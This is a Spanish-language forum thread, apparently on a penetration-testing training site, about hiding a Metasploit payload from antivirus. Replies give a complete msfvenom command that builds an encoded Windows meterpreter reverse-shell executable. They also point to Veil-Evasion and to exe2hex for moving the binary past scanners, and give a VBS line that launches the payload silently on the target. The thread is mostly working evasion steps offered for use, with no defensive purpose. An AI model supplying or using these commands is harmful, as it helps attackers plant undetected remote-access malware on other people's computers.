Dashboard » Debates » encriptacion de payload

Alejandro Canosa Ferreiro realizo una pregunta

encriptacion de payload

Buenas tardes en el ultimo video se ejecuta msfpayload windows/meterpreter/reverse_tcp/ lhost=direccion local lport=443 pero la parte de la encriptacion por el logo de backtrack no se ve alguien me puede decir como encriptar el paylod en este comando para que se blinde y no pueda ser detectado por un virus?,en el utltimo video lo explica pero no he podido ver lo que escriben en esa parte de la linea por el logo de backtrack adademy

cordiales saludos a todos


Debes ser parte de la comunidad para poder comentar.

Kmorfo Sr ha comentado hace
más de 7 años

buenas, prueba utilizando el msfvenom, un ejemplo:

msfvenom -p windows/meterpreter/reversetcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikataga_nai -i 3 -f exe -o mipayload.exe

tambien puedes utilizar otros generadores de payload como veil-evasion que los genera directmente en varios formatos y opciones.


Alejandro Canosa Ferreiro ha comentado hace
más de 7 años

muchas gracias compa lo probare en cuanto pueda un saludo


Qismon . ha comentado hace
más de 7 años

Veil-Evasion & MSF Venom son muy publicas y su encriptacion es muy conocido, pero todavia funciona con algunas anti-virus.

Si quieres algo que esta totalmente indetectable "scantime" entonces puedes convertir tu payload binary a HEX y despues que esta en el PC del "target" puedes convertir a .exe para ejecutarlo. Eso se llama "Inline File Transfer" y puedes lograr eso con este pequeno herramienta.

https://github.com/g0tmi1k/exe2hex

Ahora puedes crear un script de VBS que puede llamar este payload en silencio, asi:

CreateObject("WScript.Shell").RUN "C:\Users\Public\payload.cmd", 0, True